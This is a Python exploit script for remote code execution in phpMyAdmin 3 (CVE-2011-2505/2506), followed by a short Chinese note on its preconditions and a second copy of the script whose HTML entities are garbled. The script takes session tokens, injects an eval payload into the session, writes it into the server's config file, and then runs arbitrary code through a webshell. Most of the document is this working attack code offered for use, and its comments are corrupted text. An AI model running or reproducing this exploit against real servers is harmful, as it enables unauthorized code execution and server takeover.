#!/usr/bin/env python
# coding=utf-8
# pma3 - phpMyAdmin3 remote code execute exploit
# Author: wofeiwo<wofeiwo@80sec.com
# Thx Superhei
# Tested on: 3.1.1, 3.2.1, 3.4.3
# CVE: CVE-2011-2505, CVE-2011-2506
# Date: 2011-07-08
# Have fun, DO *NOT* USE IT TO DO BAD THING.
################################################
 
# Requirements: 1. "config" directory must created&writeable in pma directory.
#               2. session.auto_start = 1 in php.ini configuration.
 
 
import os,sys,urllib2,re
 
def usage(program):
    print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code
execute exploit"
    print "Usage: %s <PMA_url>" % program
    print "Example: %s http://www.test.com/phpMyAdmin" % program
    sys.exit(0)
 
def main(args):
    try:
        if len(args) < 2:
            usage(args[0])
 
        if args[1][-1] == "/":
            args[1] = args[1][:-1]
 
        # ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ�
        print "[+] Trying get form token&session_id.."
        content = urllib2.urlopen(args[1]+"/index.php").read()
        r1 = re.findall("token=(\w{32})", content)
        r2 = re.findall("phpMyAdmin=(\w{32,40})", content)
 
        if not r1:
            r1 = re.findall("token\" value=\"(\w{32})\"", content)
        if not r2:
            r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)
        if len(r1) < 1 or len(r2) < 1:
            print "[-] Cannot find form token and session id...exit."
            sys.exit(-1)
 
        token = r1[0]
        sessionid = r2[0]
        print "[+] Token: %s , SessionID: %s" % (token, sessionid)
 
         # �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ
        print "[+] Trying to insert payload in $_SESSION.."
        uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"
        url = args[1]+uri
 
        opener = urllib2.build_opener()
        opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;
pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %
(sessionid, sessionid)))
        urllib2.install_opener(opener)
        urllib2.urlopen(url)
 
        # ����setup��ȡshell
        print "[+] Trying get webshell.."
        postdata =
"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"
% (sessionid, token)
        url = args[1]+"/setup/config.php"
 
        # print "[+]Postdata: %s" % postdata
        urllib2.urlopen(url, postdata)
        print "[+] All done, pray for your lucky!"
 
        # ���IJ����������shell
        url = args[1]+"/config/config.inc.php"
        opener.addheaders.append(('Code', 'phpinfo();'))
        urllib2.install_opener(opener)
        print "[+] Trying connect shell: %s" % url
        result = re.findall("System \</td\>\<td
class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())
        if len(result) == 1:
            print "[+] Lucky u! System info: %s"  % result[0]
            print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"
 
        else:
            print "[-] Cannot get webshell."
 
    except Exception, e:
        print e
 
if __name__ == "__main__" : main(sys.argv)


# [2011-07-08]

----------------------------------------------------------

Tested on: 3.1.1, 3.2.1, 3.4.3

利用条件:

  1. "config" 文件必须可写(或者可创建)
  2. 在PHP.ini中要session.auto_start = 1

鸡肋点:

  PHP.ini中session.auto_start默认是0

python EXP:

import os,sys,urllib2,re
 
def usage(program):
    print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code
execute exploit"
    print "Usage: %s " % program
    print "Example: %s http://www.test.com/phpMyAdmin" % program
    sys.exit(0)
 
def main(args):
    try:
        if len(args) &lt; 2:
            usage(args[0])
 
        if args[1][-1] == "/":
            args[1] = args[1][:-1]
 
        # ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ�
        print "[+] Trying get form token&amp;session_id.."
        content = urllib2.urlopen(args[1]+"/index.php").read()
        r1 = re.findall("token=(\w{32})", content)
        r2 = re.findall("phpMyAdmin=(\w{32,40})", content)
 
        if not r1:
            r1 = re.findall("token\" value=\"(\w{32})\"", content)
        if not r2:
            r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)
        if len(r1) &lt; 1 or len(r2) &lt; 1:
            print "[-] Cannot find form token and session id...exit."
            sys.exit(-1)
 
        token = r1[0]
        sessionid = r2[0]
        print "[+] Token: %s , SessionID: %s" % (token, sessionid)
 
         # �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ
        print "[+] Trying to insert payload in $_SESSION.."
        uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&amp;_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&amp;_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"
        url = args[1]+uri
 
        opener = urllib2.build_opener()
        opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;
pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %
(sessionid, sessionid)))
        urllib2.install_opener(opener)
        urllib2.urlopen(url)
 
        # ����setup��ȡshell
        print "[+] Trying get webshell.."
        postdata =
"phpMyAdmin=%s&amp;tab_hash=&amp;token=%s&amp;check_page_refresh=&amp;DefaultLang=en&amp;ServerDefault=0&amp;eol=unix&amp;submit_save=Save"
% (sessionid, token)
        url = args[1]+"/setup/config.php"
 
        # print "[+]Postdata: %s" % postdata
        urllib2.urlopen(url, postdata)
        print "[+] All done, pray for your lucky!"
 
        # ���IJ����������shell
        url = args[1]+"/config/config.inc.php"
        opener.addheaders.append(('Code', 'phpinfo();'))
        urllib2.install_opener(opener)
        print "[+] Trying connect shell: %s" % url
        result = re.findall("System \\
(.*)\\", urllib2.urlopen(url).read())
        if len(result) == 1:
            print "[+] Lucky u! System info: %s"  % result[0]
            print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"
 
        else:
            print "[-] Cannot get webshell."
 
    except Exception, e:
        print e
 
if __name__ == "__main__" : main(sys.argv)